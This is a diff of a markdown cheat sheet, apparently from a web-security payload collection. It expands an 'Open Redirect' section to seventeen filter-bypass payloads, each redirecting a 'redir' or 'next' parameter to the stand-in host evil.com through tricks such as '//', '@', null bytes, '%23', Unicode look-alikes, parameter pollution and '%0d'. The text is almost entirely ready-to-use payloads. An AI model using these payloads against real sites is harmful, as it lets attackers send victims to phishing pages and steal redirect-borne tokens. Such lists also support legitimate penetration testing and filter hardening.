1 | | - | ## Filter Bypass |
| 1 | + | ## Open Redirect |
2 | 2 | | |
3 | | - | 1. Using a whitelisted domain or keyword |
| 3 | + | 1. Try change the domain |
4 | 4 | | ``` |
5 | | - | target.com.evil.com |
| 5 | + | /?redir=evil.com |
6 | 6 | | ``` |
7 | 7 | | |
8 | | - | 2. Using "//" to bypass "http" blacklisted keyword |
| 8 | + | 2. Using a whitelisted domain or keyword |
9 | 9 | | ``` |
10 | | - | //evil.com |
| 10 | + | /?redir=target.com.evil.com |
11 | 11 | | ``` |
12 | 12 | | |
13 | | - | 3. Using "https:" to bypass "//" blacklisted keyword |
| 13 | + | 3. Using `//` to bypass `http` blacklisted keyword |
14 | 14 | | ``` |
15 | | - | https:evil.com |
| 15 | + | /?redir=//evil.com |
16 | 16 | | ``` |
17 | 17 | | |
18 | | - | 4. Using "\/\/" to bypass "//" blacklisted keyword (Browsers see \/\/ as //) |
| 18 | + | 4. Using `https:` to bypass `//` blacklisted keyword |
19 | 19 | | ``` |
20 | | - | \/\/evil.com/ |
21 | | - | /\/evil.com/ |
| 20 | + | /?redir=https:evil.com |
22 | 21 | | ``` |
23 | 22 | | |
24 | | - | 5. Using "%E3%80%82" to bypass "." blacklisted character |
| 23 | + | 5. Using `\\` to bypass `//` blacklisted keyword |
| 24 | + | ``` |
| 25 | + | /?redir=\\evil.com |
| 26 | + | ``` |
| 27 | + | |
| 28 | + | 6. Using `\/\/` to bypass `//` blacklisted keyword |
| 29 | + | ``` |
| 30 | + | /?redir=\/\/evil.com/ |
| 31 | + | /?redir=/\/evil.com/ |
| 32 | + | ``` |
| 33 | + | |
| 34 | + | 7. Using `%E3%80%82` to bypass `.` blacklisted character |
25 | 35 | | ``` |
26 | 36 | | /?redir=evil。com |
27 | 37 | | /?redir=evil%E3%80%82com |
28 | 38 | | ``` |
29 | 39 | | |
30 | | - | 6. Using null byte "%00" to bypass blacklist filter |
| 40 | + | 8. Using null byte `%00` to bypass blacklist filter |
31 | 41 | | ``` |
32 | | - | //evil%00.com |
| 42 | + | /?redir=//evil%00.com |
33 | 43 | | ``` |
34 | 44 | | |
35 | | - | 7. Using parameter pollution |
| 45 | + | 9. Using parameter pollution |
36 | 46 | | ``` |
37 | | - | ?next=target.com&next=evil.com |
| 47 | + | /?next=target.com&next=evil.com |
38 | 48 | | ``` |
39 | 49 | | |
40 | | - | 8. Using "@" character, browser will redirect to anything after the "@" |
| 50 | + | 10. Using `@` or `%40` character, browser will redirect to anything after the `@` |
41 | 51 | | ``` |
42 | | - | [email protected] |
43 | | - | target.com%40evil.com |
| 52 | + | /?redir=[email protected] |
| 53 | + | /?redir=target.com%40evil.com |
44 | 54 | | ``` |
45 | 55 | | |
46 | | - | 9. Creating folder as their domain |
| 56 | + | 11. Creating folder as their domain |
47 | 57 | | ``` |
48 | 58 | | http://www.yoursite.com/http://www.theirsite.com/ |
49 | 59 | | http://www.yoursite.com/folder/www.folder.com |
50 | 60 | | ``` |
51 | 61 | | |
52 | | - | 10. Using "?" characted, browser will translate it to "/?" |
| 62 | + | 12. Using `?` characted, browser will translate it to `/?` |
53 | 63 | | ``` |
54 | | - | http://www.yoursite.com?http://www.theirsite.com/ |
55 | | - | http://www.yoursite.com?folder/www.folder.com |
| 64 | + | /?redir=target.com?evil.com |
56 | 65 | | ``` |
57 | 66 | | |
58 | | - | 11. Host/Split Unicode Normalization |
| 67 | + | 13. Bypass the filter if it only checks for domain name using `%23` |
| 68 | + | ``` |
| 69 | + | /?redir=target.com%23evil.com |
| 70 | + | ``` |
| 71 | + | |
| 72 | + | 14. Host/Split Unicode Normalization |
59 | 73 | | ``` |
60 | 74 | | https://evil.c℀.example.com |
61 | 75 | | ``` |
62 | 76 | | |
63 | | - | 12. Using parsing |
| 77 | + | 15. Using parsing |
64 | 78 | | ``` |
65 | 79 | | http://ⓔⓥⓘⓛ.ⓒⓞⓜ |
66 | 80 | | ``` |
| 81 | + | |
| 82 | + | 16. Using `°` symbol to bypass |
| 83 | + | ``` |
| 84 | + | /?redir=target.com/°evil.com |
| 85 | + | ``` |
| 86 | + | |
| 87 | + | 17. Bypass the filter if it only allows yoou to control the path using a nullbyte `%0d` or `%0a` |
| 88 | + | ``` |
| 89 | + | /?redir=/%0d/evil.com |
| 90 | + | ``` |